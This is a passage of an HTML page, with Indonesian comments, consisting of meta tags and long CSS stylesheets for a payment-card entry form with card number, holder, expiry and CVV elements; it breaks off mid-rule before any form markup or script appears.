<!DOCTYPE html>
<html lang="en" >
<head>
    <!-- Warna untuk Chrome, Firefox OS, Opera dan Vivaldi -->
<meta content='#282828' name='theme-color'/>
<!-- Warna untuk Windows Phone -->
<meta content='#282828' name='msapplication-navbutton-color'/>
<!-- Warna untuk iOS Safari -->
 <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#2F4F4F"> 
   <!-- HTML Meta Tags -->

  <title>
</title>

  <meta name="description" content="">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="">
  <meta property="og:type" content="website">
  <meta property="og:title" content="
">
  <meta property="og:description" content="">
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6L8L1xb8YefJLV5XwNgvP7wNMASOwb_yvXquLyied-ajsZ_6Ik39RkkM&s=10">

  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6L8L1xb8YefJLV5XwNgvP7wNMASOwb_yvXquLyied-ajsZ_6Ik39RkkM&s=10">
  <meta property="twitter:url" content="">
  <meta name="twitter:title" content="">
  <meta name="twitter:description" content=".">
  <meta name="twitter:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6L8L1xb8YefJLV5XwNgvP7wNMASOwb_yvXquLyied-ajsZ_6Ik39RkkM&s=10">

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
<link rel="icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6L8L1xb8YefJLV5XwNgvP7wNMASOwb_yvXquLyied-ajsZ_6Ik39RkkM&s=10" type="image/x-icon" />
<link rel="apple-touch-icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6L8L1xb8YefJLV5XwNgvP7wNMASOwb_yvXquLyied-ajsZ_6Ik39RkkM&s=10" />
  <!-- Meta Tags Generated via https://www.opengraph.xyz -->
        
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="./style.css">

</head>
<body>
    <style>
        
@import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

.html {
    width: 100%;
    height: 100%;
    background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
}

body{
 background: url("https://github.com/unitetger/Me355/blob/main/IMG_20250422_200208.jpg?raw=true");
  
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;

  background-position: 100% 100%;
  background-size: 100% 100%;
  font-size: 16px;
  width: 100%;
  height: 860px;
  }
* {
  box-sizing: border-box;
}
*:focus {
  outline: none;
}

.wrapper {
  min-height: 20vh;
  display: flex;
  padding: 10px 15px;
}
@media screen and (max-width: 700px), (max-height: 440px) {
  .wrapper {
    flex-wrap: wrap;
    flex-direction: column;
  }
}

.card-form {
  max-width: 320px;
  margin: auto;
  width: 100%;
  height: 340px;
}
@media screen and (max-width: 576px) {
  .card-form {
    margin: 20 auto;
  }

.card-form__inner {
  background: url("https://github.com/unitetger/Me355/blob/main/IMG_20250422_195526.png?raw=true");
  font-family: "Source Sans Pro", sans-serif;
 
  background-position: 100% 100%;
  background-size: 100% 100%;
 outline-style: ridge;
 paint-order: stroke markers fill;
  box-shadow: #FFD700  1px 2px 3px;
  border-radius: 10px;
  border: 6px #FFD700;
  color: #FFA500;
  height: 300px;
  padding-top: 10px;
 
}
@media screen and (max-width: 480px) {
  .card-form__inner {
    padding: 0px;
    padding-top: 80px;
  }
}
@media screen and (max-width: 480px) {
  .card-form__inner {
    padding: 20px;
    padding-top: 80px;
  }
}
.card-form__row {
  display: flex;
  align-items: flex-text;
}
@media screen and (max-width: 480px) {
  .card-form__row {
    flex-wrap: wrap;
  }
}
.card-form__col {
  flex: auto;
  margin-right: 35px;
}
.card-form__col:last-child {
  margin-right: 0;
}
@media screen and (max-width: 480px) {
  .card-form__col {
    margin-right: 0;
    flex: unset;
    width: 100%;
    margin-bottom: 0px;
  }
  .card-form__col:last-child {
    margin-bottom: 0;
  }
}
.card-form__col.-cvv {
  max-width: 150px;
}
@media screen and (max-width: 480px) {
  .card-form__col.-cvv {
    max-width: initial;
  }
}
.card-form__group {
  display: flex;
  align-items: flex-start;
  flex-wrap: wrap;
}
.card-form__group .card-input__input {
  flex: 1;
  margin-right: 15px;
}
.card-form__group .card-input__input:last-child {
  margin-right: 0;
}
.card-form__button {
  width: 100%;
  height: 29px;
  box-shadow:  ;
  box-shadow: #808080  2px 8px 12px; 
  background: #DAA520;
  outline-style: groove;
  color: #fff;
  border-radius: 16px;
  font-size: 15px;
  font-weight: 500;
  border: 1px solid #FFA500;
  margin-top: 0px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-form__button {
    margin-top: 0px;
  }
}

.card-item {top: 10px;
  max-width: 430px;
  height: 140px;
  margin-left: auto;
  margin-right: auto;
  position: relative;
  z-index: 2;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item {
    max-width: 300px;
    height: 170px;
    width: 80%;
  }
}
@media screen and (max-width: 360px) {
  .card-item {
    height: 190px;
  }
}
.card-item.-active .card-item__side.-front {
  transform: perspective(1000px) rotateY(180deg) rotateX(0deg) rotateZ(0deg);
}
.card-item.-active .card-item__side.-back {
  transform: perspective(1000px) rotateY(0) rotateX(0deg) rotateZ(0deg);
}
.card-item__focus {
  position: absolute;
  z-index: 3;
  border-radius: 5px;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  transition: all 0.35s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  opacity: 0;
  pointer-events: none;
  overflow: hidden;
  border: 2px solid rgba(255, 255, 255, 0.65);
}
.card-item__focus:after {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  background: #08142f;
  height: 100%;
  border-radius: 5px;
  filter: blur(25px);
  opacity: 0.5;
}
.card-item__focus.-active {
  opacity: 1;
}
.card-item__side {
  border-radius: 15px;
  overflow: hidden;
  box-shadow: 0 20px 60px 0 rgba(14, 42, 90, 0.55);
  transform: perspective(2000px) rotateY(0deg) rotateX(0deg) rotate(0deg);
  transform-style: preserve-3d;
  transition: all 0.8s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  backface-visibility: hidden;
  height: 100%;
}
.card-item__side.-back {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  transform: perspective(2000px) rotateY(-180deg) rotateX(0deg) rotate(0deg);
  z-index: 2;
  padding: 0;
  height: 100%;
}
.card-item__side.-back .card-item__cover {
  transform: rotateY(-180deg);
}
.card-item__bg {
  max-width: 100%;
  display: block;
  max-height: 100%;
  height: 100%;
  width: 100%;
  object-fit: cover;
  border: 3px solid snow;
  border-radius: 15px;
  padding: 10px;
}
.card-item__cover {
  height: 100%;
  background-color: white;
  position: absolute;
  height: 100%;
  background-color: white;
  left: 0;
  top: 0;
  width: 100%;
  border-radius: 15px;
  overflow: hidden;
}
.card-item__cover:after {
  content: "";
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  background: ;
}
.card-item__top {
  display: flex;
  border: 2px;
  align-items: flex-start;
  justify-content: space-between;
  margin-bottom: 40px;
  padding: 0 10px;
}
@charset "utf-8";

html { line-height: 1.5; text-size-adjust: 100%; font-family: system-ui, sans-serif; -webkit-font-smoothing: antialiased; text-rendering: optimizelegibility; touch-action: manipulation; }

body { position: relative; min-height: 100%; font-feature-settings: "kern"; }

*, ::before, ::after { border-width: 0px; border-style: solid; box-sizing: border-box; }

main { display: block; }

hr { border-top-width: 1px; box-sizing: content-box; height: 0px; overflow: visible; }

pre, code, kbd, samp { font-family: SFMono-Regular, Menlo, Monaco, Consolas, monospace; font-size: 1em; }

a { background-color: transparent; color: inherit; text-decoration: inherit; }

abbr[title] { border-bottom: none; text-decoration: underline dotted; }

b, strong { font-weight: bold;font-size: 10px; color :#B8860B;}

small { font-size: 80%; }

sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; }

sub { bottom: -0.25em; }

sup { top: -0.5em; }

img { border-style: none; }

button, input, optgroup, select, textarea { font-family: inherit; font-size: 100%; line-height: 1.15; margin: 0px; }

button, input { overflow: visible; }

button, select { text-transform: none; }

fieldset { padding: 0.35em 0.75em 0.625em; }

legend { box-sizing: border-box; color: inherit; display: table; max-width: 100%; padding: 0px; white-space: normal; }

progress { vertical-align: baseline; }

textarea { overflow: auto; }

[type="checkbox"], [type="radio"] { box-sizing: border-box; padding: 0px; }

[type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { appearance: none !important; }

input[type="number"] { }

[type="search"] { appearance: textfield; outline-offset: -2px; }

[type="search"]::-webkit-search-decoration { appearance: none !important; }

::-webkit-file-upload-button { appearance: button; font: inherit; }

details { display: block; }

summary { display: list-item; }

template { display: none; }

[hidden] { display: none !important; }

body, blockquote, dl, dd, h1, h2, h3, h4, h5, h6, hr, figure, p, pre { margin: 0px; }

button { background: transparent; padding: 0px; }

fieldset { margin: 0px; padding: 0px; }

ol, ul { margin: 0px; padding: 0px; }

textarea { resize: vertical; }

button, [role="button"] { cursor: pointer; }

table { border-collapse: collapse; }

h1, h2, h3, h4, h5, h6 { font-size: inherit; font-weight: inherit; }

button, input, optgroup, select, textarea { padding: 0px; line-height: inherit; color: inherit; }

img, svg, video, canvas, audio, iframe, embed, object { display: block; }

img, video { max-width: 100%; height: auto; }

[data-js-focus-visible] :focus:not([data-focus-visible-added]):not([data-focus-visible-disabled]) { outline: none; box-shadow: none; }
</style>
<style>

@charset "utf-8";



::-webkit-input-placeholder { color: var(--chakra-colors-chakra-placeholder-color); }

::placeholder {

    font-weight: 600;
    
    font-size: 12px;
    color: 	#8B4513; 
}

*, ::before, ::after { border-color: var(--chakra-colors-chakra-border-color); overflow-wrap: break-word; }
</style>
<style>

@charset "utf-8";

.css-536van { max-width: 440px; margin: auto; overflow: hidden; height: 100%; }
</style>
<style>

@charset "utf-8";

.css-1kh160d { background-color: rgba(255, 255, 255, 0.4); position: fixed; inset: 0px; display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; z-index: 9; }

.css-v7v99c { width: 100px; }

.css-otdls7 { background-color: rgb(244, 244, 244); height: 100%; display: flex; flex-direction: column; }

.css-m25hbt { background-color: white; padding: 10px 10px; }

.css-r8xns0 { height: 27px; }

.css-6icz3w { width: 100%; height: 170px; }

.css-1h7se0k { text-align: center; flex: 1 1 0%; }

.css-k9xuz5 { margin: 0px auto; }

.css-140rqgf { text-align: left; padding: 10px 20px; margin-bottom: 18px; }

.css-14zpys6 { font-weight: 700; color: var(--chakra-colors-blue-500); font-size: var(--chakra-fontSizes-xl); text-align: center; }

.css-1gu96id { margin-bottom: 20px; font-weight: 600; color: var(--chakra-colors-blue-500); font-size: var(--chakra-fontSizes-sm); text-align: center; }

.css-1jnktsq { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-blue-500); font-weight: var(--chakra-fontWeights-bold); }

.css-1jnktsq[disabled], .css-1jnktsq[aria-disabled="true"], .css-1jnktsq[data-disabled] { cursor: not-allowed; }

.css-1ncbew8 { width: var(--chakra-sizes-4); transition-property: box-shadow; transition-duration: var(--chakra-transition-duration-normal); border-width: 2px; border-style: solid; border-image: initial; border-radius: var(--chakra-radii-sm); border-color: inherit; color: var(--chakra-colors-white); height: var(--chakra-sizes-4); display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; vertical-align: top; user-select: none; flex-shrink: 0; }

.css-1ncbew8[aria-checked="true"], .css-1ncbew8[data-checked] { background: var(--chakra-colors-blue-500); border-color: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); }

.css-1ncbew8[aria-checked="true"]:hover, .css-1ncbew8[data-checked]:hover, .css-1ncbew8[aria-checked="true"][data-hover], .css-1ncbew8[data-checked][data-hover] { background: var(--chakra-colors-blue-600); border-color: var(--chakra-colors-blue-600); }

.css-1ncbew8[aria-checked="true"][disabled], .css-1ncbew8[data-checked][disabled], .css-1ncbew8[aria-checked="true"][aria-disabled="true"], .css-1ncbew8[data-checked][aria-disabled="true"], .css-1ncbew8[aria-checked="true"][data-disabled], .css-1ncbew8[data-checked][data-disabled] { border-color: var(--chakra-colors-gray-200); background: var(--chakra-colors-gray-200); color: var(--chakra-colors-gray-500); }

.css-1ncbew8:indeterminate, .css-1ncbew8[aria-checked="mixed"], .css-1ncbew8[data-indeterminate] { background: var(--chakra-colors-blue-500); border-color: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); }

.css-1ncbew8[disabled], .css-1ncbew8[aria-disabled="true"], .css-1ncbew8[data-disabled] { background: var(--chakra-colors-gray-100); border-color: var(--chakra-colors-gray-100); }

.css-1ncbew8:focus-visible, .css-1ncbew8[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-1ncbew8[aria-invalid="true"], .css-1ncbew8[data-invalid] { border-color: var(--chakra-colors-red-500); }

.css-1sgc0qu { margin-inline-start: 0.5rem; user-select: none; font-size: var(--chakra-fontSizes-md); }

.css-1sgc0qu[disabled], .css-1sgc0qu[aria-disabled="true"], .css-1sgc0qu[data-disabled] { opacity: 0.4; }

.css-1tqjkcb { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-blue-500); font-weight: var(--chakra-fontWeights-bold); margin-bottom: 20px; }

.css-1tqjkcb[disabled], .css-1tqjkcb[aria-disabled="true"], .css-1tqjkcb[data-disabled] { cursor: not-allowed; }

.css-jgamys { font-size: 16px; text-align: center; color: rgb(14, 120, 202); font-weight: 500; }

.css-g9qnka { padding: 0px 20px; }

.css-q9238k { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 2px; outline-offset: 2px; line-height: 1.2; border-radius: var(--chakra-radii-full); font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(--chakra-transition-duration-normal); height: var(--chakra-sizes-10); min-width: var(--chakra-sizes-10); font-size: var(--chakra-fontSizes-md); padding-inline-start: var(--chakra-space-4); padding-inline-end: var(--chakra-space-4); background: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); width: var(--chakra-sizes-full); margin-top: 32px; }

.css-q9238k:focus-visible, .css-q9238k[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-q9238k[disabled], .css-q9238k[aria-disabled="true"], .css-q9238k[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-q9238k:hover, .css-q9238k[data-hover] { background: var(--chakra-colors-blue-600); }

.css-q9238k:hover[disabled], .css-q9238k[data-hover][disabled], .css-q9238k:hover[aria-disabled="true"], .css-q9238k[data-hover][aria-disabled="true"], .css-q9238k:hover[data-disabled], .css-q9238k[data-hover][data-disabled] { background: var(--chakra-colors-blue-500); }

.css-q9238k:active, .css-q9238k[data-active] { background: var(--chakra-colors-blue-700); }

.css-129zm1u { font-weight: 700; font-size: var(--chakra-fontSizes-sm); text-align: center; }

.css-dnzamn { display: flex; -webkit-box-pack: center; justify-content: center; margin: 20px 0px; }

.css-1eqmq6c { width: 70px; }

.css-1hfq88p { background-color: rgb(45, 120, 189); padding: 10px; }

.css-dz67t0 { font-size: 11px; text-align: center; color: var(--chakra-colors-white); }

.css-k18gpu { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-red-500); font-weight: var(--chakra-fontWeights-bold); }

.css-k18gpu[disabled], .css-k18gpu[aria-disabled="true"], .css-k18gpu[data-disabled] { cursor: not-allowed; }

.css-15rtx21 { width: var(--chakra-sizes-4); transition-property: box-shadow; transition-duration: var(--chakra-transition-duration-normal); border-width: 2px; border-style: solid; border-image: initial; border-radius: var(--chakra-radii-sm); border-color: inherit; color: var(--chakra-colors-white); height: var(--chakra-sizes-4); display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; vertical-align: top; user-select: none; flex-shrink: 0; }

.css-15rtx21[aria-checked="true"], .css-15rtx21[data-checked] { background: var(--chakra-colors-red-500); border-color: var(--chakra-colors-red-500); color: var(-webkit-chakra-colors-wh: ;
-moz-chakra-colors-wh: ;
-ms-chakra-colors-wh: ;
-o-chakra-colors-wh: ;
chakra-colors-wh: ;ite); }

.css-15rtx21[aria-checked="true"]:hover, .css-15rtx21[data-checked]:hover, .css-15rtx21[aria-checked="true"][data-hover], .css-15rtx21[data-checked][data-hover] { background: var(--chakra-colors-red-600); border-color: var(--chakra-colors-red-600); }

.css-15rtx21[aria-checked="true"][disabled], .css-15rtx21[data-checked][disabled], .css-15rtx21[aria-checked="true"][aria-disabled="true"], .css-15rtx21[data-checked][aria-disabled="true"], .css-15rtx21[aria-checked="true"][data-disabled], .css-15rtx21[data-checked][data-disabled] { border-color: var(--chakra-colors-gray-200); background: var(--chakra-colors-gray-200); color: var(--chakra-colors-gray-500); }

.css-15rtx21:indeterminate, .css-15rtx21[aria-checked="mixed"], .css-15rtx21[data-indeterminate] { background: var(--chakra-colors-red-500); border-color: var(--chakra-colors-red-500); color: var(--chakra-colors-white); }

.css-15rtx21[disabled], .css-15rtx21[aria-disabled="true"], .css-15rtx21[data-disabled] { background: var(--chakra-colors-gray-100); border-color: var(--chakra-colors-gray-100); }

.css-15rtx21:focus-visible, .css-15rtx21[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-15rtx21[aria-invalid="true"], .css-15rtx21[data-invalid] { border-color: var(--chakra-colors-red-500); }

.css-1sy58bw { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-red-500); font-weight: var(--chakra-fontWeights-bold); margin-bottom: 0px; }

.css-1sy58bw[disabled], .css-1sy58bw[aria-disabled="true"], .css-1sy58bw[data-disabled] { cursor: not-allowed; }

.css-1r69mki { opacity: 1; transform: scale(1); font-size: 0.625rem; transition-property: transform; transition-duration: var(--chakra-transition-duration-normal); width: 1.2em; }

.css-1sm2s1z { height: 90%; display: flex; flex-direction: column; }

.css-13fbd8g { max-height: 100%; background: url("") left bottom / cover; width: 100%; height: 60%; position: relative; text-align: center; }

.css-1hvggs4 { height: 48px; margin-bottom: 20px; background-color: transparent; box-shadow: rgb(47, 79, 79) 0px 0px 3px 1px; display: flex; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; }

.css-arqxt3 { color: var(--chakra-colors-white); font-size: 19px; font-family: AvenirBold; }

.css-1v97jab { width: 100%; padding: 0px; max-width: 450px; margin: auto; position: absolute; bottom: 0px; left: 0px; right: 0px; }

@media (max-width: 400px) {
  .css-1v97jab { max-width: 400px;  }
}
.css-1meg77l { background-color: #fff; box-shadow: #FFD700 0px 1px 0px; border-radius: 12px; margin-top: 0px;  width: 100%; max-width:100%; padding: 5px; border-bottom: px solid #0f78cb;}

.css-q7z8lq { color: rgb(14, 120, 202); font-size: 19px; font-family: AvenirBold; }

.css-2z8rzx { border-radius: 12px; margin-top: 0px;  width: 100%; box-shadow: rgb(220, 220, 220) 0px 0px 0px 0px; border-radius: }

.css-qhzfk3 { border-radius: 0px; margin-top: 10px;  width: 100%;  margin-top: 0px; padding: 10px  10px; border-bottom: 0px solid rgb(219, 219, 219); display: flex; -webkit-box-align: center; align-items: center;ox-shadow: rgb(169, 169, 196) 0px 1px 10px 1px; }

.css-1fq0ymr { border-radius: 12px; margin-top: 10px;  width: 100%; width: 26px; margin-right: 20px ; }

.css-1ew2b06 { border-radius: 22px; margin-top: 10px;  width: 100%; background-color: #FFEBCD; font-weight: 430;margin-top: 2px; padding: 7px  10px; border-bottom: 2px solid #B8860f;
    
    font-size: 12px;
    color: 	#000; height: 30px; font-family: AvenirBold; width: 100%; }

.css-1iarp40 { width: 24px; height: 25px; object-fit: contain; margin-right: 24px; }

.css-tb4kah { width: 23px; height: 25px; object-fit: contain; margin-right: 24px; }

.css-ldq9nk { margin-top: 12px text-align: right; }

.css-1w471m1 { font-size: 14px; font-family: AvenirBold; margin-top: 4px; text-align:right; }

.css-70qvj9 { display: flex; -webkit-box-align: center; align-items: center; }
.css-2z5j4d { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 0px; outline-offset: 0px; line-height: 0px; border-radius: 5px; font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(--chakratransition-duration-normal); height: 32px; min-width: var(--chakra-sizes-10); font-size: var(--chakra-fontSizes-md); padding-inline-start: var(--flex-space-4); padding-inline-end: var(--chakra-space-4); background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat-x:  background-repeat-y: ; background-attachment: ; background-origin: ; background-clip: ;flex: 20%; width: 300px; margin-top: 0vh; background: url("https://static.vecteezy.com/system/resources/thumbnails/023/256/184/small_2x/modern-banner-background-colorful-orange-and-yellow-colors-cross-memphis-free-vector.jpg");color: #fff; font-family: bold;font-weight: 430; font-size: 14px; box-shadow: rgb(51, 51, 51) 2px 2px 7px;}
.css-2z5j4d:focus-visible, .css-2z5j4d[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-2z5j4d[disabled], .css-2z5j4d[aria-disabled="true"], .css-2z5j4d[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-2z5j4d:hover, .css-2z5j4d[data-hover] { background-color: rgb(14, 120, 202); }

.css-2z5j4d:active, .css-2z5j4d[data-active] { background: var(--chakra-colors-gray-300); }

.css-2z5j4d:focus, .css-2z5j4d[data-focus] { background-color: rgb(14, 120, 202); }

.css-1h9adj1 { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 2px; outline-offset: 2px; line-height: 1.2; border-radius: 6px; font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(-webkit-chakra-trans: ;
-moz-chakra-trans: ;
-ms-chakra-trans: ;
-o-chakra-trans: ;
chakra-trans: ;ition-duration-normal); height: 32px; min-width: var(--chakra-sizes-10); font-size: var(--chakra-fontSizes-md); padding-inline-start: var(--chakra-space-4); padding-inline-end: var(--chakra-space-4); background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat-x: ; background-repeat-y: ; background-attachment: ; background-origin background-clip: ; margin-left: 1 1 0%; width: 130px; margin-top: 0vh; background: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRj04UlnHQ0n_fN6Q0uIcXm9ttNBKNNBQnnzQ&s"); color: var(--chakr1-colors-white); font-family: AvenirBold; padding: 5px; color: #fff;font-weight: 430; box-shadow: rgb(51, 51, 51) 1px 1px 6px;;font-size: 14px; }


.css-1h9adj1:focus-visible, .css-1h9adj1[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-1h9adj1[disabled], .css-1h9adj1[aria-disabled="true"], .css-1h9adj1[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-1h9adj1:hover, .css-1h9adj1[data-hover] { background-color: rgb(14, 120, 202); }

.css-1h9adj1:active, .css-1h9adj1[data-active] { background: var(--chakra-colors-gray-300); }

.css-1h9adj1:focus, .css-1h9adj1[data-focus] { background-color: rgb(14, 120, 202); }

.css-m3dotl { width: 60px; object-fit: contain; }
</style>
<style>

@charset "utf-8";

@font-face { font-family: Avenir; src: url("/fonts/avenir_next_regular.ttf"); }

@font-face { font-family: AvenirBold; src: url("/fonts/avenir_next_bold.ttf"); }

@font-face { font-family: AvenirMedium; src: url("/fonts/avenir_next_medium.ttf"); }

body, html { padding: 0px; margin: 0px; font-family: Avenir, "Helvetica Neue", sans-serif; }

#__next, body, html { height: 100%; }

a { color: inherit ; text-decoration: none; }

* { box-sizing: border-box; }

input { outline: unset !important; }

@-webkit-keyframes from-top { 
  0% { transform: translateY(-60px); }
  100% { transform: translateY(0px); }
}

@keyframes from-top { 
  0% { transform: translateY(-60px); }
  100% { transform: translateY(0px); }
}

@-webkit-keyframes kedip { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}

@keyframes kedip { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}
        .eye {
            display: block;
            margin: -29px auto;
            margin-right: 24px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8170px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;  }
@media screen and (max-width: 480px) {
  .card-item__top {
    margin-bottom: 25px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__top {
    margin-bottom: 20px;
  }
}
.card-item__chip {
  width: 60px;
}
@media screen and (max-width: 480px) {
  .card-item__chip {
    width: 50px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__chip {
    width: 40px;
  }
}
.card-item__type {
  height: 45px;
  position: relative;
  display: flex;
  justify-content: flex-end;
  max-width: 100px;
  margin-left: auto;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item__type {
    height: 40px;
    max-width: 90px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__type {
    height: 30px;
  }
}
.card-item__typeImg {
  max-width: 100%;
  object-fit: contain;
  max-height: 100%;
  object-position: top right;
}
.card-item__info {
  color: #fff;
  width: 100%;
  max-width: calc(100% - 85px);
  padding: 10px 15px;
  font-weight: 500;
  display: block;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__info {
    padding: 10px;
  }
}
.card-item__holder {
  opacity: 100;
  font-size: 13px;
  margin-bottom: 6px;
  color: yellow;
}
@media screen and (max-width: 480px) {
  .card-item__holder {
    font-size: 12px;
    margin-bottom: 5px;
  }
}
.card-item__wrapper {
  font-family: "Source Code Pro", monospace;
  padding: 15px 15px;
  position: relative;
  z-index: 4;
  height: 100%;
  text-shadow: 7px 6px 10px rgba(14, 42, 90, 0.8);
  user-select: none;
}
@media screen and (max-width: 480px) {
  .card-item__wrapper {
    padding: 10px 10px;
  }
}
.card-item__name {
  font-size: 18px;
  line-height: 1;
  white-space: nowrap;
  max-width: 100%;
  overflow: hidden;
  text-overflow: ellipsis;
  text-transform: uppercase;
}
@media screen and (max-width: 480px) {
  .card-item__name {
    font-size: 16px;
  }
}
.card-item__nameItem {
  display: inline-block;
  min-width: 8px;
  position: relative;
}
.card-item__number {
  font-weight: 500;
  line-height: 1;
  color: #fff;
  font-size: 27px;
  margin-bottom: 35px;
  display: inline-block;
  padding: 10px 15px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__number {
    font-size: 21px;
    margin-bottom: 15px;
    padding: 10px 10px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__number {
    font-size: 19px;
    margin-bottom: 10px;
    padding: 10px 10px;
  }
}
.card-item__numberItem {
  width: 16px;
  display: inline-block;
}
.card-item__numberItem.-active {
  width: 30px;
}
@media screen and (max-width: 480px) {
  .card-item__numberItem {
    width: 13px;
  }
  .card-item__numberItem.-active {
    width: 16px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__numberItem {
    width: 12px;
  }
  .card-item__numberItem.-active {
    width: 8px;
  }
}
.card-item__content {
  color: #fff;
  display: flex;
  align-items: flex-start;
}
.card-item__date {
  flex-wrap: wrap;
  font-size: 18px;
  margin-left: -5;
  padding: 10px;
  display: inline-flex;
  width: 80px;
  white-space: nowrap;
  flex-shrink: 0;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__date {
    font-size: 16px;
    width: 140px;
    height: 45px;
    padding-top: -5px;
  }
}
.card-item__dateItem {
  position: relative;
}
.card-item__dateItem span {
  width: 22px;
  margin-left: 25px;
  display: inline-block;
}
.card-item__dateTitle {
  opacity: 100;
  font-size: 13px;
  padding-bottom: 6px;
  width: 100%;
  margin-left: 0px;
}
@media screen and (max-width: 480px) {
  .card-item__dateTitle {
    font-size: 12px;
    padding-bottom: 5px;
    margin-left: 20px;
    color: yellow;
    
  }
}
.card-item__band {
  background: rgba(0, 0, 19, 0.8);
  width: 100%;
  height: 50px;
  margin-top: 30px;
  position: relative;
  z-index: 2;
}
@media screen and (max-width: 480px) {
  .card-item__band {
    margin-top: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__band {
    height: 40px;
    margin-top: 10px;
  }
}
.card-item__cvv {
  text-align: right;
  position: relative;
  z-index: 2;
  padding: 15px;
}
.card-item__cvv .card-item__type {
  opacity: 0.7;
}
@media screen and (max-width: 360px) {
  .card-item__cvv {
    padding: 10px 15px;
  }
}
.card-item__cvvTitle {
  padding-right: 10px;
  font-size: 15px;
  font-weight: 500;
  color: #fff;
  margin-bottom: 5px;
}
.card-item__cvvBand {
  height: 45px;
  background: #fff;
  margin-bottom: 30px;
  text-align: right;
  display: flex;
  align-items: center;
  justify-content: flex-end;
  padding-right: 10px;
  color: #008000;
  font-size: 18px;
  border-radius: 4px;
  box-shadow: 0px 10px 20px -7px #008000;
}
@media screen and (max-width: 480px) {
  .card-item__cvvBand {
    height: 40px;
    margin-bottom: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__cvvBand {
